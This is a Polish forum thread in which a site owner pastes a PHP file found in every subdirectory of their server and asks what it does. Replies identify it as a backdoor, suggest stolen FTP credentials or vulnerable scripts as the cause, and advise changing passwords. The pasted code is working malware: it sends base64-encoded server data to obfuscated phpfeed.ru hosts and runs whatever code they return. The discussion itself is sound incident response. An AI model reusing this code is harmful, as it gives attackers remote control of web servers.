Dziś na FTPie zobaczyłem dziwne pliku typu 14234.php w każdym z podkatalogów. A nich był taki kod:

[PHP] pobierz, plaintext 
error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwZmVlZC5ydQ==");
 
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="efc1c2e5b4abb3c0af1b6ff7a20906a7") $f=$_REQUEST["id"];
if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$o=curl_exec($cu);
curl_close($cu);
eval($o);};
die();
[PHP] pobierz, plaintext 

Ktoś może mi powiedzieć co to jest? Ktoś chciał się włamać na serwer?

Zgadnę, że łączysz się przez total commandera, filezillę czy coś w ten deseń - oczywiście hasła zapamiętane. ;]
Wirus odczytuje hasła z ftp i loginy i robi co chce - np. dodaje kod złośliwy.

Błąd Używam Maca, korzystam z CyberDuck (darmowy, ściągnięty z oficjalnej strony)

Zacznij od zmiany hasła, potem od usuwania kodu.

btw na macu to wirusów nie ma? jakaś nowość.

Ok zmienione, tak na wszelki wypadek. Co to kod miał za zadanie zrobić?

Są ale jest ich na pewno mniej i są rzadziej spotykane. Poza tym chyba ciężko dorzucić wirusa do programu który jest oryginalny i od ponad roku nie sprawiał problemów?

~fifi209, to że ktoś z TC korzysta, to nie znaczy, że hasła muszą pochodzić z tego miejsca. Można korzystać z globalnego klucza albo SFTP/SCP (tak, da się ).


Sprawdź swoje skrypty. Są dziurawe. Albo któraś z bibliotek, z których korzystają.

To zwykły backdoor, który pozwala na dołączenie Twojego serwera jako farmy zombie.

Większość serwerów nie pozwala na SFTP (bo to w końcu SSH, do tego wolne bo nie projektowano go do transferu plików). Dodajmy że OSX to nie windows - pyta cię zawsze o dostęp do keyringa oraz jeśli to nieznana apka to dodatkowo o twoje hasło.
Z doświadczenia powiem, że nie ma za bardzo sposobu aby z keyringa hasła wyciągać - szybciej tutaj jest błąd w samej webaplikacji - zanalizuj logi lub je pokaż tu.